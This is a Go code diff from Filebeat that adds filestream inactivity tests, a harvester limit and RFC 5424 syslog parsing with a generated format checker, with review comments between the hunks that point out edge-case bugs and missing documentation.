+ env.requireOffsetInRegistryByID(id, len(testlines))
 }
 // test_close_eof from test_harvester.py
@@ -217,9 +257,6 @@ func TestFilestreamBOMUTF8(t *testing.T) {
 "paths": []string{env.abspath(testlogName)},
 })
- ctx, cancelInput := context.WithCancel(context.Background())
- env.startInput(ctx, inp)
-
 // BOM: 0xEF,0xBB,0xBF
 lines := append([]byte{0xEF, 0xBB, 0xBF}, []byte(`#Software: Microsoft Exchange Server
 #Version: 14.0.0.0
@@ -231,6 +268,9 @@ func TestFilestreamBOMUTF8(t *testing.T) {
 `)...)
 env.mustWriteLinesToFile(testlogName, lines)
+ ctx, cancelInput := context.WithCancel(context.Background())
+ env.startInput(ctx, inp)
+
 env.waitUntilEventCount(7)
 cancelInput()
@@ -259,9 +299,6 @@ func TestFilestreamUTF16BOMs(t *testing.T) {
 "encoding": name,
 })
- ctx, cancelInput := context.WithCancel(context.Background())
- env.startInput(ctx, inp)
-
 line := []byte("first line\n")
 buf := bytes.NewBuffer(nil)
 writer := transform.NewWriter(buf, encoder)
@@ -270,6 +307,9 @@ func TestFilestreamUTF16BOMs(t *testing.T) {
 env.mustWriteLinesToFile(testlogName, buf.Bytes())
+ ctx, cancelInput := context.WithCancel(context.Background())
+ env.startInput(ctx, inp)
+
 env.waitUntilEventCount(1)
 env.requireEventsReceived([]string{"first line"})
@@ -311,3 +351,169 @@ func TestFilestreamCloseTimeout(t *testing.T) { env.requireOffsetInRegistry(testlogName, len(testlines)) } + +// test_close_inactive from test_input.py +func TestFilestreamCloseAfterInterval(t *testing.T) { + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName)}, + "prospector.scanner.check_interval": "24h", + "close.on_state_change.check_interval": "100ms", + "close.on_state_change.inactive": "2s", + }) + + testlines := []byte("first line\nsecond line\nthird line\n") + env.mustWriteLinesToFile(testlogName, testlines) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(3) + env.requireOffsetInRegistry(testlogName, len(testlines)) + env.waitUntilHarvesterIsDone() + + cancelInput() + env.waitUntilInputStops() +} + +// test_close_inactive_file_removal from test_input.py +func TestFilestreamCloseAfterIntervalRemoved(t *testing.T) { + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName)}, + "prospector.scanner.check_interval": "24h", + "close.on_state_change.check_interval": "10ms", + "close.on_state_change.inactive": "100ms", + // reader is not stopped when file is removed to see if the reader can still detect + // if the file has been inactive even if it have been removed in the meantime + "close.on_state_change.removed": "false", + }) + + testlines := []byte("first line\nsecond line\nthird line\n") + env.mustWriteLinesToFile(testlogName, testlines) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(3) + env.requireOffsetInRegistry(testlogName, len(testlines)) + + env.mustRemoveFile(testlogName) + + env.waitUntilHarvesterIsDone() + + cancelInput() + env.waitUntilInputStops() +} + +func 
TestFilestreamCloseAfterIntervalRenamed(t *testing.T) { + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName)}, + "prospector.scanner.check_interval": "24h", + "close.on_state_change.check_interval": "10ms", + "close.on_state_change.inactive": "100ms", + // reader is not stopped when file is removed to see if the reader can still detect + // if the file has been inactive even if it have been removed in the meantime + "close.on_state_change.removed": "false", + }) + + testlines := []byte("first line\nsecond line\nthird line\n") + env.mustWriteLinesToFile(testlogName, testlines) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(3) + env.requireOffsetInRegistry(testlogName, len(testlines)) + + newFileName := "test_rotated.log" + env.mustRenameFile(testlogName, newFileName) + + env.waitUntilHarvesterIsDone() + + cancelInput() + env.waitUntilInputStops() +} + +// test_close_inactive_file_rotation_and_removal from test_input.py +func TestFilestreamCloseAfterIntervalRotatedAndRemoved(t *testing.T) { + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName)}, + "prospector.scanner.check_interval": "24h", + "close.on_state_change.check_interval": "10ms", + "close.on_state_change.inactive": "100ms", + // reader is not stopped when file is removed to see if the reader can still detect + // if the file has been inactive even if it have been removed in the meantime + "close.on_state_change.removed": "false", + }) + + testlines := []byte("first line\nsecond line\nthird line\n") + env.mustWriteLinesToFile(testlogName, testlines) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(3) + env.requireOffsetInRegistry(testlogName, 
len(testlines)) + + newFileName := "test_rotated.log" + env.mustRenameFile(testlogName, newFileName) + env.mustRemoveFile(newFileName) + + env.waitUntilHarvesterIsDone() + + cancelInput() + env.waitUntilInputStops() +} + +// test_close_inactive_file_rotation_and_removal2 from test_input.py +func TestFilestreamCloseAfterIntervalRotatedAndNewRemoved(t *testing.T) { + env := newInputTestingEnvironment(t) + + testlogName := "test.log" + inp := env.mustCreateInput(map[string]interface{}{ + "paths": []string{env.abspath(testlogName)}, + "prospector.scanner.check_interval": "1ms", + "close.on_state_change.check_interval": "10ms", + "close.on_state_change.inactive": "100ms", + // reader is not stopped when file is removed to see if the reader can still detect + // if the file has been inactive even if it have been removed in the meantime + "close.on_state_change.removed": "false", + }) + + testlines := []byte("first line\nsecond line\nthird line\n") + env.mustWriteLinesToFile(testlogName, testlines) + + ctx, cancelInput := context.WithCancel(context.Background()) + env.startInput(ctx, inp) + + env.waitUntilEventCount(3) + env.requireOffsetInRegistry(testlogName, len(testlines)) + + newFileName := "test_rotated.log" + env.mustRenameFile(testlogName, newFileName) + + env.waitUntilHarvesterIsDone() + + newTestlines := []byte("rotated first line\nrotated second line\nrotated third line\n") + env.mustWriteLinesToFile(testlogName, newTestlines) + + env.waitUntilEventCount(6) + + env.mustRemoveFile(newFileName) + + env.waitUntilHarvesterIsDone() + + cancelInput() + env.waitUntilInputStops() +} diff --git a/filebeat/input/filestream/internal/input-logfile/harvester.go b/filebeat/input/filestream/internal/input-logfile/harvester.go index 5f926386aa7..72d0c27e4c8 100644 --- a/filebeat/input/filestream/internal/input-logfile/harvester.go +++ b/filebeat/input/filestream/internal/input-logfile/harvester.go 
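Review bot: `TestFilestreamCloseAfterIntervalRenamed` is the only new test in this hunk without a `// test_… from test_input.py` reference, and its config comment still describes the file being removed although the test renames it. I would add the reference to the Python test it ports, if there is one, and reword the comment to `// close.on_state_change.removed is disabled; the test checks that inactivity is still detected after the file has been renamed`. The five tests also repeat the same create-input, write, start and wait sequence, so a small helper taking the config overrides would make the one differing step in each test easier to see.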
@@ -35,6 +35,7 @@ import ( var ( ErrHarvesterAlreadyRunning = errors.New("harvester is already running for file") + ErrHarvesterLimitReached = errors.New("harvester limit reached") ) // Harvester is the reader which collects the lines from @@ -51,11 +52,17 @@ type Harvester interface { type readerGroup struct { mu sync.Mutex + limit uint64 table map[string]context.CancelFunc } func newReaderGroup() *readerGroup { + return newReaderGroupWithLimit(0) +} + +func newReaderGroupWithLimit(limit uint64) *readerGroup { return &readerGroup{ + limit: limit, table: make(map[string]context.CancelFunc), } } @@ -70,6 +77,10 @@ func (r *readerGroup) newContext(id string, cancelation v2.Canceler) (context.Co r.mu.Lock() defer r.mu.Unlock() + if 0 < r.limit && r.limit <= uint64(len(r.table)) { + return nil, nil, ErrHarvesterLimitReached + } + if _, ok := r.table[id]; ok { return nil, nil, ErrHarvesterAlreadyRunning } @@ -118,12 +129,12 @@ type defaultHarvesterGroup struct { harvester Harvester cleanTimeout time.Duration store *store + identifier *sourceIdentifier tg unison.TaskGroup } -// Start starts the Harvester for a Source. It does not block. func (hg *defaultHarvesterGroup) Start(ctx input.Context, s Source) { - sourceName := s.Name() + sourceName := hg.identifier.ID(s) ctx.Logger = ctx.Logger.With("source", sourceName) ctx.Logger.Debug("Starting harvester for file") @@ -175,7 +186,7 @@ func (hg *defaultHarvesterGroup) Start(ctx input.Context, s Source) { // Stop stops the running Harvester for a given Source. func (hg *defaultHarvesterGroup) Stop(s Source) { hg.tg.Go(func(_ unison.Canceler) error { - hg.readers.remove(s.Name()) + hg.readers.remove(hg.identifier.ID(s)) return nil }) } diff --git a/filebeat/input/filestream/internal/input-logfile/harvester_test.go b/filebeat/input/filestream/internal/input-logfile/harvester_test.go index 6bc6f2f72e6..9425c30be4b 100644 --- a/filebeat/input/filestream/internal/input-logfile/harvester_test.go 
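Review bot: Nothing on `readerGroup.limit` or `newReaderGroupWithLimit` says that a limit of 0 means unlimited; that only follows from the `0 < r.limit` guard in `newContext`. A comment such as `// newReaderGroupWithLimit returns a readerGroup that refuses new readers once limit of them are registered; 0 disables the limit.` would make the contract explicit, and `ErrHarvesterLimitReached` deserves a one-line comment as well. Because the limit check runs before the duplicate-id check, starting an id that is already running while the group is full reports `ErrHarvesterLimitReached` rather than `ErrHarvesterAlreadyRunning`; if callers distinguish the two, the checks should be swapped. The `// Start starts the Harvester for a Source. It does not block.` comment is also removed from the exported `Start` without a replacement. `newContext` and `Start` both continue outside their hunks.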
+++ b/filebeat/input/filestream/internal/input-logfile/harvester_test.go @@ -85,17 +85,27 @@ func TestReaderGroup(t *testing.T) { require.Equal(t, 1, len(rg.table)) require.Nil(t, newCtx.Err()) }) + + t.Run("assert new harvester cannot be added if limit is reached", func(t *testing.T) { + rg := newReaderGroupWithLimit(1) + require.Equal(t, 0, len(rg.table)) + ctx, cf, err := rg.newContext("test-id", context.Background()) + requireGroupSuccess(t, ctx, cf, err) + ctx, cf, err = rg.newContext("test-id", context.Background()) + requireGroupError(t, ctx, cf, err) + }) + } func TestDefaultHarvesterGroup(t *testing.T) { source := &testSource{"/path/to/test"} requireSourceAddedToBookkeeper := func(t *testing.T, hg *defaultHarvesterGroup, s Source) { - require.True(t, hg.readers.hasID(s.Name())) + require.True(t, hg.readers.hasID(hg.identifier.ID(s))) } requireSourceRemovedFromBookkeeper := func(t *testing.T, hg *defaultHarvesterGroup, s Source) { - require.False(t, hg.readers.hasID(s.Name())) + require.False(t, hg.readers.hasID(hg.identifier.ID(s))) } t.Run("assert a harvester is started in a goroutine", func(t *testing.T) { @@ -154,7 +164,7 @@ func TestDefaultHarvesterGroup(t *testing.T) { gorountineChecker.WaitUntilIncreased(2) // error is expected as a harvester group was expected to start twice for the same source - for !hg.readers.hasID(source.Name()) { + for !hg.readers.hasID(hg.identifier.ID(source)) { } time.Sleep(3 * time.Millisecond) @@ -212,7 +222,7 @@ func TestDefaultHarvesterGroup(t *testing.T) { hg := testDefaultHarvesterGroup(t, mockHarvester) inputCtx := input.Context{Logger: logp.L(), Cancelation: context.Background()} - r, err := lock(inputCtx, hg.store, source.Name()) + r, err := lock(inputCtx, hg.store, hg.identifier.ID(source)) if err != nil { t.Fatalf("cannot lock source") } 
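Review bot: The new limit subtest calls `newContext` twice with the same id `"test-id"`, so the second call would already fail on the duplicate-id path in `newContext` even if the limit were ignored. Use a different id for the second call and assert the specific error, for example `ctx, cf, err = rg.newContext("other-id", context.Background())` followed by `require.Equal(t, ErrHarvesterLimitReached, err)`. What `requireGroupError` checks is not visible in this hunk, so it may or may not already compare the error value.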
@@ -226,7 +236,7 @@ func TestDefaultHarvesterGroup(t *testing.T) { ok := false for !ok { // wait until harvester is added to the bookeeper - ok = hg.readers.hasID(source.Name()) + ok = hg.readers.hasID(hg.identifier.ID(source)) if ok { releaseResource(r) } @@ -248,7 +258,7 @@ func TestDefaultHarvesterGroup(t *testing.T) { gorountineChecker := resources.NewGoroutinesChecker() defer gorountineChecker.WaitUntilOriginalCount() - r, err := lock(inputCtx, hg.store, source.Name()) + r, err := lock(inputCtx, hg.store, hg.identifier.ID(source)) if err != nil { t.Fatalf("cannot lock source") } @@ -265,11 +275,12 @@ func TestDefaultHarvesterGroup(t *testing.T) { func testDefaultHarvesterGroup(t *testing.T, mockHarvester Harvester) *defaultHarvesterGroup { return &defaultHarvesterGroup{ - readers: newReaderGroup(), - pipeline: &pipelinemock.MockPipelineConnector{}, - harvester: mockHarvester, - store: testOpenStore(t, "test", nil), - tg: unison.TaskGroup{}, + readers: newReaderGroup(), + pipeline: &pipelinemock.MockPipelineConnector{}, + harvester: mockHarvester, + store: testOpenStore(t, "test", nil), + identifier: &sourceIdentifier{"filestream::.global::", false}, + tg: unison.TaskGroup{}, } } diff --git a/filebeat/input/filestream/internal/input-logfile/input.go b/filebeat/input/filestream/internal/input-logfile/input.go index 41219c88659..dfc9a9817a0 100644 --- a/filebeat/input/filestream/internal/input-logfile/input.go +++ b/filebeat/input/filestream/internal/input-logfile/input.go @@ -36,6 +36,7 @@ type managedInput struct { prospector Prospector harvester Harvester cleanTimeout time.Duration + harvesterLimit uint64 } // Name is required to implement the v2.Input interface 
@@ -62,10 +63,11 @@ func (inp *managedInput) Run( hg := &defaultHarvesterGroup{ pipeline: pipeline, - readers: newReaderGroup(), + readers: newReaderGroupWithLimit(inp.harvesterLimit), cleanTimeout: inp.cleanTimeout, harvester: inp.harvester, store: groupStore, + identifier: inp.sourceIdentifier, tg: unison.TaskGroup{}, } diff --git a/filebeat/input/filestream/internal/input-logfile/manager.go b/filebeat/input/filestream/internal/input-logfile/manager.go index 8d8548e22f0..e861fe5ab95 100644 --- a/filebeat/input/filestream/internal/input-logfile/manager.go +++ b/filebeat/input/filestream/internal/input-logfile/manager.go @@ -155,9 +155,10 @@ func (cim *InputManager) Create(config *common.Config) (input.Input, error) { } settings := struct { - ID string `config:"id"` - CleanTimeout time.Duration `config:"clean_timeout"` - }{ID: "", CleanTimeout: cim.DefaultCleanTimeout} + ID string `config:"id"` + CleanTimeout time.Duration `config:"clean_timeout"` + HarvesterLimit uint64 `config:"harvester_limit"` + }{ID: "", CleanTimeout: cim.DefaultCleanTimeout, HarvesterLimit: 0} if err := config.Unpack(&settings); err != nil { return nil, err } @@ -190,6 +191,7 @@ func (cim *InputManager) Create(config *common.Config) (input.Input, error) { harvester: harvester, sourceIdentifier: sourceIdentifier, cleanTimeout: settings.CleanTimeout, + harvesterLimit: settings.HarvesterLimit, }, nil } diff --git a/filebeat/input/filestream/internal/input-logfile/store.go b/filebeat/input/filestream/internal/input-logfile/store.go index 3bd3fcdb081..6cd0028c61c 100644 --- a/filebeat/input/filestream/internal/input-logfile/store.go +++ b/filebeat/input/filestream/internal/input-logfile/store.go 
@@ -270,7 +270,7 @@ func (s *store) findCursorMeta(key string, to interface{}) error { // updateMetadata updates the cursor metadata in the persistent store. func (s *store) updateMetadata(key string, meta interface{}) error { - resource := s.ephemeralStore.Find(key, false) + resource := s.ephemeralStore.Find(key, true) if resource == nil { return fmt.Errorf("resource '%s' not found", key) } diff --git a/filebeat/input/filestream/prospector.go b/filebeat/input/filestream/prospector.go index 89932773648..f08e4346c74 100644 --- a/filebeat/input/filestream/prospector.go +++ b/filebeat/input/filestream/prospector.go @@ -113,6 +113,12 @@ func (p *fileProspector) Run(ctx input.Context, s loginp.StateMetadataUpdater, h case loginp.OpCreate, loginp.OpWrite: if fe.Op == loginp.OpCreate { log.Debugf("A new file %s has been found", fe.NewPath) + + err := s.UpdateMetadata(src, fileMeta{Source: fe.NewPath, IdentifierName: p.identifier.Name()}) + if err != nil { + log.Errorf("Failed to set cursor meta data of entry %s: %v", src.Name(), err) + } + } else if fe.Op == loginp.OpWrite { log.Debugf("File %s has been updated", fe.NewPath) } @@ -169,7 +175,10 @@ func (p *fileProspector) Run(ctx input.Context, s loginp.StateMetadataUpdater, h meta.IdentifierName = p.identifier.Name() } - s.UpdateMetadata(src, fileMeta{Source: src.newPath, IdentifierName: meta.IdentifierName}) + err = s.UpdateMetadata(src, fileMeta{Source: src.newPath, IdentifierName: meta.IdentifierName}) + if err != nil { + log.Errorf("Failed to update cursor meta data of entry %s: %v", src.Name(), err) + } if p.stateChangeCloser.Renamed { log.Debugf("Stopping harvester as file %s has been renamed and close.on_state_change.renamed is enabled.", src.Name()) diff --git a/filebeat/input/log/harvester.go b/filebeat/input/log/harvester.go index 6b16861f8ec..0d4e6d6b539 100644 --- a/filebeat/input/log/harvester.go +++ b/filebeat/input/log/harvester.go 
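Review bot: The switch from `s.ephemeralStore.Find(key, false)` to `Find(key, true)` in `updateMetadata` carries no comment explaining why. If the second argument is a create-if-missing flag (its signature is not part of this diff), the `resource == nil` branch and its "not found" error are probably unreachable now, and a metadata update for an unknown key would create a registry entry instead of failing. A line such as `// create the resource if it is missing: metadata can be set before a cursor has been stored` would record the intent, if that is the intent. The body of `updateMetadata` continues outside the hunk.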
@@ -331,10 +331,6 @@ func (h *Harvester) Run() error { logp.Info("End of file reached: %s. Closing because close_eof is enabled.", h.state.Source) case ErrInactive: logp.Info("File is inactive: %s. Closing because close_inactive of %v reached.", h.state.Source, h.config.CloseInactive) - case reader.ErrLineUnparsable: - logp.Info("Skipping unparsable line in file: %v", h.state.Source) - //line unparsable, go to next line - continue default: logp.Err("Read line error: %v; File: %v", err, h.state.Source) } diff --git a/filebeat/input/syslog/config.go b/filebeat/input/syslog/config.go index dd2803ecc09..4df453ca626 100644 --- a/filebeat/input/syslog/config.go +++ b/filebeat/input/syslog/config.go @@ -36,13 +36,31 @@ import ( type config struct { harvester.ForwarderConfig `config:",inline"` + Format syslogFormat `config:"format"` Protocol common.ConfigNamespace `config:"protocol"` } +type syslogFormat int + +const ( + syslogFormatRFC3164 = iota + syslogFormatRFC5424 + syslogFormatAuto +) + +var ( + syslogFormats = map[string]syslogFormat{ + "rfc3164": syslogFormatRFC3164, + "rfc5424": syslogFormatRFC5424, + "auto": syslogFormatAuto, + } +) + var defaultConfig = config{ ForwarderConfig: harvester.ForwarderConfig{ Type: "syslog", }, + Format: syslogFormatRFC3164, } type syslogTCP struct { @@ -122,3 +140,12 @@ func factory( return nil, fmt.Errorf("you must choose between TCP or UDP") } } + +func (f *syslogFormat) Unpack(value string) error { + format, ok := syslogFormats[value] + if !ok { + return fmt.Errorf("invalid format '%s'", value) + } + *f = format + return nil +} diff --git a/filebeat/input/syslog/event.go b/filebeat/input/syslog/event.go index c5eccd6ea67..8d0a7738e6f 100644 --- a/filebeat/input/syslog/event.go +++ b/filebeat/input/syslog/event.go @@ -18,6 +18,7 @@ package syslog import ( + "bytes" "math" "time" ) 
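Review bot: In filebeat/input/syslog/config.go the three format constants are untyped, because `syslogFormatRFC3164 = iota` names no type, so they are accepted wherever any integer is expected. Declaring the first as `syslogFormatRFC3164 syslogFormat = iota` types all three. `Unpack` would also be easier to act on if its error named the accepted values, e.g. `fmt.Errorf("invalid format '%s', expected rfc3164, rfc5424 or auto", value)`. Neither `syslogFormat` nor `Unpack` has a comment; one line each, stating that rfc3164 is the default, would help.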
@@ -72,8 +73,17 @@ type event struct { year int loc *time.Location sequence int + + // RFC 5424 + version int + appName string + msgID string + processID string + data EventData } +type EventData map[string]map[string]string + // newEvent() return a new event. func newEvent() *event { return &event{ @@ -86,6 +96,7 @@ func newEvent() *event { second: -1, year: time.Now().Year(), sequence: -1, + version: -1, } } @@ -198,7 +209,12 @@ func (s *event) Year() int { // SetMessage sets the message. func (s *event) SetMessage(b []byte) { - s.message = string(b) + // remove BOM + if b[0] == 0xef && b[1] == 0xbb && b[2] == 0xbf { + s.message = string(b[3:]) + } else { + s.message = string(b) + } } // Message returns the message. @@ -298,6 +314,39 @@ func (s *event) Nanosecond() int { return s.nanosecond } +// SetVersion sets the version. +func (s *event) SetVersion(version []byte) { + s.version = bytesToInt(version) +} + +func (s *event) Version() int { + return s.version +} + +func (s *event) SetAppName(appname []byte) { + s.appName = string(appname) +} + +func (s *event) AppName() string { + return s.appName +} + +func (s *event) SetMsgID(msgID []byte) { + s.msgID = string(msgID) +} + +func (s *event) MsgID() string { + return s.msgID +} + +func (s *event) SetProcID(processID []byte) { + s.processID = string(processID) +} + +func (s *event) ProcID() string { + return s.processID +} + // Timestamp return the timestamp in UTC. func (s *event) Timestamp(timezone *time.Location) time.Time { var t *time.Location 
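Review bot: `SetMessage` indexes `b[0]`, `b[1]` and `b[2]` without checking the length, so an empty slice, or a one- or two-byte slice that begins like the BOM, causes an index-out-of-range panic. The bytes originate from the syslog listener, so truncated or malformed input must not be able to panic the input; whether the generated parsers can pass such a slice is not visible here. `bytes` is imported by this commit, so the body can be `s.message = string(bytes.TrimPrefix(b, []byte{0xef, 0xbb, 0xbf}))`, which keeps the BOM stripping and is safe for any length.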
@@ -319,9 +368,39 @@ func (s *event) Timestamp(timezone *time.Location) time.Time { ).UTC() } +func (s *event) IsDataEmpty() bool { + if s.data == nil { + return true + } + return len(s.data) == 0 +} + // IsValid returns true if the date and the message are present. func (s *event) IsValid() bool { - return s.day != -1 && s.hour != -1 && s.minute != -1 && s.second != -1 && s.message != "" + return s.day != -1 && s.hour != -1 && s.minute != -1 && s.second != -1 && (s.message != "" || !s.IsDataEmpty()) +} + +func (s *event) SetData(id string, key string, data []byte, start int, end int, bs []int) { + var v string + + // param value escape + // https://tools.ietf.org/html/rfc5424#section-6.3.3 + if len(bs) > 0 { + buf := bytes.NewBufferString("") + for _, i := range bs { + buf.Write(data[start:i]) + start = i + 1 + } + if start <= end { + buf.Write(data[start:end]) + } + v = buf.String() + } else { + v = string(data[start:end]) + } + if element, ok := s.data[id]; ok { + element[key] = v + } } // BytesToInt takes a variable length of bytes and assume ascii chars and convert it to int, this is diff --git a/filebeat/input/syslog/format_check.go b/filebeat/input/syslog/format_check.go new file mode 100644 index 00000000000..6a63626b4cc --- /dev/null +++ b/filebeat/input/syslog/format_check.go 
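Review bot: `SetData` drops the value without any signal when `s.data[id]` has no entry, and the `newEvent` hunk in this file adds only `version: -1`, so the caller must have created the inner map first. That precondition belongs in a doc comment, e.g. `// SetData stores the param value for key under the SD-ID id, skipping the escape bytes at the positions in bs; id must already be registered, otherwise the value is discarded.` `start`, `end` and the entries of `bs` are used as slice bounds on parser input without validation, which is safe only while the generated parser is the sole caller. `IsDataEmpty` can be reduced to `return len(s.data) == 0`, since the length of a nil map is 0.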
@@ -0,0 +1,299 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +//line parser/format_check.rl:1 +// Code generated by ragel DO NOT EDIT. +package syslog + +//line format_check.go:8 +const format_check_start int = 1 +const format_check_first_final int = 15 +const format_check_error int = 0 + +const format_check_en_main int = 1 + +//line parser/format_check.rl:9 + +func IsRFC5424Format(data []byte) bool { + var p, cs int + isRFC5424 := false + pe := len(data) + +//line format_check.go:24 + { + cs = format_check_start + } + +//line format_check.go:29 + { + if (p) == (pe) { + goto _test_eof + } + switch cs { + case 1: + goto st_case_1 + case 0: + goto st_case_0 + case 2: + goto st_case_2 + case 3: + goto st_case_3 + case 4: + goto st_case_4 + case 5: + goto st_case_5 + case 6: + goto st_case_6 + case 7: + goto st_case_7 + case 8: + goto st_case_8 + case 9: + goto st_case_9 + case 15: + goto st_case_15 + case 10: + goto st_case_10 + case 11: + goto st_case_11 + case 12: + goto st_case_12 + case 13: + goto st_case_13 + case 14: + goto st_case_14 + } + goto st_out + st_case_1: + if data[(p)] == 60 { + goto st2 + } + goto st0 + st_case_0: + st0: + cs = 0 + goto _out + st2: + if (p)++; (p) == (pe) { + goto _test_eof2 + } + 
st_case_2: + switch data[(p)] { + case 48: + goto st3 + case 49: + goto st12 + } + if 50 <= data[(p)] && data[(p)] <= 57 { + goto st13 + } + goto st0 + st3: + if (p)++; (p) == (pe) { + goto _test_eof3 + } + st_case_3: + if data[(p)] == 62 { + goto st4 + } + goto st0 + st4: + if (p)++; (p) == (pe) { + goto _test_eof4 + } + st_case_4: + if 49 <= data[(p)] && data[(p)] <= 57 { + goto st5 + } + goto st0 + st5: + if (p)++; (p) == (pe) { + goto _test_eof5 + } + st_case_5: + if data[(p)] == 32 { + goto st6 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st10 + } + goto st0 + st6: + if (p)++; (p) == (pe) { + goto _test_eof6 + } + st_case_6: + if 48 <= data[(p)] && data[(p)] <= 57 { + goto tr9 + } + goto st0 + tr9: +//line parser/format_check.rl:17 + + isRFC5424 = true + + goto st7 + st7: + if (p)++; (p) == (pe) { + goto _test_eof7 + } + st_case_7: +//line format_check.go:143 + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st8 + } + goto st0 + st8: + if (p)++; (p) == (pe) { + goto _test_eof8 + } + st_case_8: + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st9 + } + goto st0 + st9: + if (p)++; (p) == (pe) { + goto _test_eof9 + } + st_case_9: + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st15 + } + goto st0 + st15: + if (p)++; (p) == (pe) { + goto _test_eof15 + } + st_case_15: + goto st0 + st10: + if (p)++; (p) == (pe) { + goto _test_eof10 + } + st_case_10: + if data[(p)] == 32 { + goto st6 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st11 + } + goto st0 + st11: + if (p)++; (p) == (pe) { + goto _test_eof11 + } + st_case_11: + if data[(p)] == 32 { + goto st6 + } + goto st0 + st12: + if (p)++; (p) == (pe) { + goto _test_eof12 + } + st_case_12: + switch data[(p)] { + case 57: + goto st14 + case 62: + goto st4 + } + if 48 <= data[(p)] && data[(p)] <= 56 { + goto st13 + } + goto st0 + st13: + if (p)++; (p) == (pe) { + goto _test_eof13 + } + st_case_13: + if data[(p)] == 62 { + goto st4 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st3 + } + goto st0 + 
st14: + if (p)++; (p) == (pe) { + goto _test_eof14 + } + st_case_14: + if data[(p)] == 62 { + goto st4 + } + if 48 <= data[(p)] && data[(p)] <= 49 { + goto st3 + } + goto st0 + st_out: + _test_eof2: + cs = 2 + goto _test_eof + _test_eof3: + cs = 3 + goto _test_eof + _test_eof4: + cs = 4 + goto _test_eof + _test_eof5: + cs = 5 + goto _test_eof + _test_eof6: + cs = 6 + goto _test_eof + _test_eof7: + cs = 7 + goto _test_eof + _test_eof8: + cs = 8 + goto _test_eof + _test_eof9: + cs = 9 + goto _test_eof + _test_eof15: + cs = 15 + goto _test_eof + _test_eof10: + cs = 10 + goto _test_eof + _test_eof11: + cs = 11 + goto _test_eof + _test_eof12: + cs = 12 + goto _test_eof + _test_eof13: + cs = 13 + goto _test_eof + _test_eof14: + cs = 14 + goto _test_eof + + _test_eof: + { + } + _out: + { + } + } + +//line parser/format_check.rl:28 + + return isRFC5424 +} diff --git a/filebeat/input/syslog/format_check_test.go b/filebeat/input/syslog/format_check_test.go new file mode 100644 index 00000000000..d7c14055589 --- /dev/null +++ b/filebeat/input/syslog/format_check_test.go 
@@ -0,0 +1,33 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package syslog + +import ( + "testing" + + "gotest.tools/assert" +) + +func TestIsRFC5424(t *testing.T) { + assert.Equal(t, IsRFC5424Format([]byte(RfcDoc65Example1)), true) + assert.Equal(t, IsRFC5424Format([]byte(RfcDoc65Example2)), true) + assert.Equal(t, IsRFC5424Format([]byte(RfcDoc65Example3)), true) + assert.Equal(t, IsRFC5424Format([]byte(RfcDoc65Example4)), true) + assert.Equal(t, IsRFC5424Format([]byte("<190>2018-06-19T02:13:38.635322-0700 super mon message")), false) + assert.Equal(t, IsRFC5424Format([]byte("<190>589265: Feb 8 18:55:31.306: %SEC-11-IPACCESSLOGP: list 177 denied udp 10.0.0.1(53640) -> 10.100.0.1(15600), 1 packet")), false) +} diff --git a/filebeat/input/syslog/input.go b/filebeat/input/syslog/input.go index 7e93ca162e1..ee8f9ab1e30 100644 --- a/filebeat/input/syslog/input.go +++ b/filebeat/input/syslog/input.go 
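Review bot: `TestIsRFC5424` covers complete messages only; since `IsRFC5424Format` is called on raw network input in auto mode, the empty and truncated cases deserve a test as well. I would add `assert.Equal(t, IsRFC5424Format(nil), false)` and `assert.Equal(t, IsRFC5424Format([]byte("<34>1")), false)`. A table of named cases run with `t.Run` would also make it clear which input a failure belongs to.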
